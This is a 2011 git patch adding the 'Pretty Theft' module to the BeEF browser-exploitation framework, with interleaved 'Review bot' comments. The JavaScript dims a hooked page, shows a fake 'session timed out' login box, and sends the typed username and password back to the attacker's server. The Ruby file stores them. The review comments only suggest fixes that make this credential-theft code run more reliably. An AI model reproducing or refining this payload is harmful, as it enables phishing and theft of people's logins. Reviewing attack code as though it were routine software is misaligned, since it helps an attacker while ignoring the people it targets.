From 02d25cc82b1a98474f7fafdc7df6f268bb11c9ed Mon Sep 17 00:00:00 2001
From: Christian Frichot
Date: Thu, 24 Nov 2011 21:23:43 +0800
Subject: [PATCH] (Fixes issue 561): Pretty Theft module added (and tidied up a bit, can now run multiple times, and enter key submits form)
---
modules/misc/pretty_theft/command.js | 117 ++++++++++++++++++++++++++
modules/misc/pretty_theft/config.yaml | 25 ++++++
modules/misc/pretty_theft/module.rb | 35 ++++++++
3 files changed, 177 insertions(+)
create mode 100644 modules/misc/pretty_theft/command.js
create mode 100644 modules/misc/pretty_theft/config.yaml
create mode 100644 modules/misc/pretty_theft/module.rb
diff --git a/modules/misc/pretty_theft/command.js b/modules/misc/pretty_theft/command.js
new file mode 100644
index 000000000..9e06ee561
--- /dev/null
+++ b/modules/misc/pretty_theft/command.js
@@ -0,0 +1,117 @@
+//
+// Copyright 2011 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+
+ imgr = "<%== @imgsauce %>";
+ var answer= '';
+ // set up darkening
+ function grayOut(vis, options) {
+ // Pass true to gray out screen, false to ungray
+ // options are optional. This is a JSON object with the following (optional) properties
+ // opacity:0-100 // Lower number = less grayout higher = more of a blackout
+ // zindex: # // HTML elements with a higher zindex appear on top of the gray out
+ // bgcolor: (#xxxxxx) // Standard RGB Hex color code
+ // grayOut(true, {'zindex':'50', 'bgcolor':'#0000FF', 'opacity':'70'});
+ // Because options is JSON opacity/zindex/bgcolor are all optional and can appear
+ // in any order. Pass only the properties you need to set.
+ var options = options || {};
+ var zindex = options.zindex || 50;
+ var opacity = options.opacity || 70;
+ var opaque = (opacity / 100);
+ var bgcolor = options.bgcolor || '#000000';
+ var dark=document.getElementById('darkenScreenObject');
+ if (!dark) {
+ // The dark layer doesn't exist, it's never been created. So we'll
+ // create it here and apply some basic styles.
+ // If you are getting errors in IE see: http://support.microsoft.com/default.aspx/kb/927917
+ var tbody = document.getElementsByTagName("body")[0];
+ var tnode = document.createElement('div'); // Create the layer.
+ tnode.style.position='absolute'; // Position absolutely
+ tnode.style.top='0px'; // In the top
+ tnode.style.left='0px'; // Left corner of the page
+ tnode.style.overflow='hidden'; // Try to avoid making scroll bars
+ tnode.style.display='none'; // Start out Hidden
+ tnode.id='darkenScreenObject'; // Name it so we can find it later
+ tbody.appendChild(tnode); // Add it to the web page
+ dark=document.getElementById('darkenScreenObject'); // Get the object.
+ }
+ if (vis) {
+ // Calculate the page width and height
+ if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) {
+ var pageWidth = document.body.scrollWidth+'px';
+ var pageHeight = document.body.scrollHeight+'px';
+ } else if( document.body.offsetWidth ) {
+ var pageWidth = document.body.offsetWidth+'px';
+ var pageHeight = document.body.offsetHeight+'px';
+ } else {
+ var pageWidth='100%';
+ var pageHeight='100%';
+ }
+ //set the shader to cover the entire page and make it visible.
+ dark.style.opacity=opaque;
+ dark.style.MozOpacity=opaque;
+ dark.style.filter='alpha(opacity='+opacity+')';
+ dark.style.zIndex=zindex;
+ dark.style.backgroundColor=bgcolor;
+ dark.style.width= pageWidth;
+ dark.style.height= pageHeight;
+ dark.style.display='block';
+ } else {
+ dark.style.display='none';
+ }
+ }
+
+ // function to send response
+ function win(){
+ document.getElementById('hax').innerHtml='

Thank you for re-authenticating, you will now be returned to the application

';
+ answer = document.getElementById('uname').value+':'+document.getElementById('pass').value;
+ }
+
+ // perform darkening
+ grayOut(true);
+
+ function checker(){
+ processval = document.body.lastChild.getElementsByTagName("input")[2].value;
+ if (processval == "Processing..") {
+ uname = document.body.lastChild.getElementsByTagName("input")[0].value;
+ pass = document.body.lastChild.getElementsByTagName("input")[1].value;
+ answer = uname+":"+pass
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);
+ // set lastchild invisible
+ document.body.lastChild.setAttribute('style','display:none');
+ // lighten screen
+ grayOut(false);
+ clearInterval(credgrabber);
+ }
+ }
+
+
+ // floating div
+ function writeit() {
+ sneakydiv = document.createElement('div');
+ sneakydiv.setAttribute('id', 'hax');
+ sneakydiv.setAttribute('style', 'width:400px;height:320px;position:absolute; top:30%; left:40%; z-index:51; background-color:ffffff;font-family:\'Arial\',Arial,sans-serif;border-width:thin;border-style:solid;border-color:#000000');
+ sneakydiv.setAttribute('align', 'center');
+ document.body.appendChild(sneakydiv);
+ sneakydiv.innerHTML= '

Your session has timed out!

For your security, your session has been timed out. To continue browsing this site, please re-enter your username and password below.

Username:
Password:

';
+ credgrabber = setInterval(checker,1000);
+
+ }
+
+ writeit();
+
+
+});
diff --git a/modules/misc/pretty_theft/config.yaml b/modules/misc/pretty_theft/config.yaml
new file mode 100644
index 000000000..ae8f0f078
--- /dev/null
+++ b/modules/misc/pretty_theft/config.yaml
@@ -0,0 +1,25 @@
+#
+# Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ pretty_theft:
+ enable: true
+ category: "Misc"
+ name: "Pretty Theft"
+ description: "Asks the user for their username and password using a tidy floating div."
+ authors: ["vt [nick.freeman@security-assessment.com]"]
+ target:
+ user_notify: ['ALL']
diff --git a/modules/misc/pretty_theft/module.rb b/modules/misc/pretty_theft/module.rb
new file mode 100644
index 000000000..de6441b3b
--- /dev/null
+++ b/modules/misc/pretty_theft/module.rb
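Review bot: In command.js, `imgr`, `processval`, `uname`, `pass`, `sneakydiv` and `credgrabber` are assigned without `var`, so they land on the `window` of the page under test instead of staying inside the `beef.execute` callback the way `answer` does. That can overwrite variables the application already defines, and since the commit message says the module can now run more than once, a second run replaces the shared `credgrabber`, so one `clearInterval(credgrabber)` stops the newer timer and leaves the other polling. Declaring them locally keeps each run self-contained: `var imgr = "<%== @imgsauce %>", sneakydiv, credgrabber;` next to `var answer`, and `var processval, uname, pass;` as the first line of `checker()`. Separately, `win()` is not called from any code visible in this hunk and assigns to `innerHtml`, which is not the DOM property name; the markup string literals are not readable on this page, so whether it is referenced from there cannot be confirmed.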
@@ -0,0 +1,35 @@
+#
+# Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Pretty_theft < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name' =>'imgsauce', 'description' =>'Custom Logo', 'ui_label'=>'Custom Logo', 'value' => 'http://beefproject.com/images/logo.png'}
+ ]
+ end
+
+ #
+ # This method is being called when a zombie sends some
+ # data back to the framework.
+ #
+ def post_execute
+
+# return if @datastore['answer']==''
+
+ save({'answer' => @datastore['answer']})
+ end
+
+end
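Review bot: `post_execute` in module.rb saves `@datastore['answer']` unconditionally, and the only guard is the commented-out `# return if @datastore['answer']==''`, which ships as dead code. As written an empty or missing answer is stored like a real result, and the old check would not have caught `nil` either. Either delete the commented line or reinstate it in a nil-safe form such as `return if @datastore['answer'].to_s.empty?`, with a comment saying why empty results are dropped. The value saved here is the `uname:pass` string built in command.js, so the method comment should state that the stored result contains plaintext credentials.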